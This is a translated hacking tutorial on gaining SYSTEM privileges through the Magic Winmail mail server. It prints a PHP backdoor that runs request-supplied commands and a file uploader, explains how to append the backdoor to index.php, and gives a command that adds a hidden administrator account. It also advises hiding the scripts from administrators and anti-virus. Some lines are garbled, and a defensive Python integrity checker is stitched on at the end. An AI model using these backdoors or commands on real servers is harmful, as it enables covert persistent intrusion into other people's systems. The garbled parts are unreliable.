Using Magic Winmail to escalate privileges

xiaoxiao2021-03-06  45

Magic Winmail is a very good mail server package that is favored by many websites, mainly small ones. However, during a recent penetration test the author found that privileges can be escalated through this software: if the server is compromised and the attacker obtains a WebShell, the result is very dangerous.

A server running Magic Winmail opens port 8080 on the system and provides an email service there, as anyone who has used it will know. The Magic Winmail server also supports PHP script execution.

Figure 1

The Magic Winmail installation folder contains a Server folder, which in turn contains a Webmail folder.

Figure 2

You can see that this folder holds a number of PHP scripts. Because Magic Winmail can execute PHP scripts, this is exactly what we use to escalate privileges. I found this method by accident. I wanted to install a backdoor on this server, but how? I like unusual approaches and generally avoid conventional methods, so I looked at port 8080 on this server, and Magic Winmail turned out to be the best place. You place a PHP script in D:/Magicw~1/Server/Webmail (the path on the machine I tested); whether it is an injected script or an ordinary PHP script, just put it there. Lis0's advice is to use it boldly. Won't there be logs? That is a beginner's worry. When a system is compromised, the administrator generally runs MD5 checks on the system and looks for script Trojans, but does not think to look for our script in this folder. Lis0 recommends using a script injected into an existing file, or one that anti-virus software does not detect. Which script do I use? Lis0 uses an UP.php written by Angel, with a few additions. Once it is in place, it is convenient for uploading further scripts or other files you have modified yourself. What about the logs? Of course they still exist, but they are inside the Magic Winmail folder, and so far few people actually look at the logs in this folder, unless they have read this article :)

Up.php CODZ

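// $id, $cmd, $file, $a and $b are never assigned in the script; they arrive as request parameters (register_globals)
if ($id == "1") {
    system($cmd);
    show_source($file);
    copy($a, $b); unlink($a);
}
?>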

$fname = $_FILES['myfile']['name'];
$do = copy($_FILES['myfile']['tmp_name'], $fname);
if ($do)
{
    echo "Upload success
";
    echo "
http://"; $server_name."".dirname($PHP_SELF)."/"."
} else {
    echo "Upload Fail";
}
?>

" method="POST">

In fact, we can insert the following code into Magic Winmail's index.php file, since its functionality is already complete. Combined with the vulnerability found by Lis0, this makes a perfect backdoor.

if ($id == "1") {
    system($cmd);
    show_source($file);
    copy($a, $b); unlink($a);
}
?>

Using http://www.target.com:8080/index.php?id=1&yy=xx we can then openly visit our compromised machine. That does seem rather underhanded :)

I still haven't described the vulnerability itself, so enough digression. Place a PHP script under D:/Magicw~1/Server/Webmail.

Figure 3

Then openly run net user Lis0 Lis0 /add & net localgroup administrators Lis0 /add. This is the vulnerability discovered by Lis0; if you don't believe it, let the compromised machine prove that I am correct.

Figure 4

This WebShell runs at SYSTEM level rather than at the Guest level you would normally get; it is a WebShell all the same, but it is treated very differently. If you want to run other tools, upload them with the UP.php I mentioned above, which should not be a problem, and then execute them from the small input box of the script.

Can you escalate privileges the same way with an ASP script, also placed under the Magic Winmail folder?

Let's analyze it: if Magic Winmail could parse PHP and ASP scripts at the same time, it should be possible. Unfortunately Magic Winmail does not parse ASP scripts; Magic Winmail is a PHP-only world.

Let's briefly analyze how this vulnerability arises. The network administrator certainly installed Magic Winmail with SYSTEM privileges, so Magic Winmail inherits the SYSTEM level. Since Magic Winmail can parse PHP scripts, any PHP script it serves is a SYSTEM-level script. In this respect Magic Winmail is somewhat similar to the domestic NetBox software.

To check whether this analysis is right, I uploaded a PHP probe to see what it reported.

Figure 5

There it is ~ nice.

SYSTEM level, other functions available, allowed / maximum 32M, and Lis0 is happy. I personally think this is the most perfect place to put a PHP script, and you can put your PHP talents to full use here. OK, that's all; I hope it helps everyone.

Workaround: where possible, run the Magic Winmail process under an account limited to Guest-level privileges.
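The article notes that administrators checksum the system but overlook the Webmail folder. As an added example (not part of the original article), the following sketch baselines the PHP files in that folder and reports new or modified scripts and any command-execution calls in them; the function names, the regex and the sample files are assumptions constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# PHP calls that run OS commands; system() is the one the article's backdoor uses.
RISKY = re.compile(rb"\b(system|exec|passthru|shell_exec|popen|proc_open)\s*\(", re.I)

def snapshot(root):
    """Map every PHP file under root (relative path) to its SHA-256 digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*"))
            if p.is_file() and p.suffix.lower() == ".php"}

def audit(root, baseline):
    """Return sorted (kind, path) findings for root against a trusted baseline."""
    current = snapshot(root)
    findings = [("missing", rel) for rel in baseline if rel not in current]
    for rel, digest in current.items():
        if baseline.get(rel) == digest:
            continue  # unchanged since the baseline was taken
        findings.append(("new" if rel not in baseline else "modified", rel))
        # Only new or changed files are scanned, so stock code is not re-flagged.
        if RISKY.search((Path(root) / rel).read_bytes()):
            findings.append(("exec-call", rel))
    return sorted(findings)

def demo():
    """Run the audit on a constructed tree standing in for the Webmail folder."""
    with tempfile.TemporaryDirectory() as tmp:
        web = Path(tmp)
        (web / "index.php").write_text("<?php echo 'login'; ?>")
        (web / "main.php").write_text("<?php echo 'inbox'; ?>")
        baseline = snapshot(web)  # taken right after a clean install
        # The two changes the article describes: an extra script dropped into
        # the folder, and code appended to index.php (both constructed here).
        (web / "up.php").write_text("<?php /* constructed placeholder */ ?>")
        (web / "index.php").write_text("<?php echo 'login'; system($cmd); ?>")
        return audit(web, baseline)

if __name__ == "__main__":
    for kind, rel in demo():
        print(f"{kind:10} {rel}")
```

Take the baseline from a clean install and keep it off the mail server, since anything running as SYSTEM there could rewrite a locally stored copy.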

Disclaimer: Since this method will come as a big surprise to many people, it may have adverse effects. The test scripts have been completely deleted. Could do not enhance your temple.

When reposting, please cite the original address: https://www.9cbs.com/read-58086.html
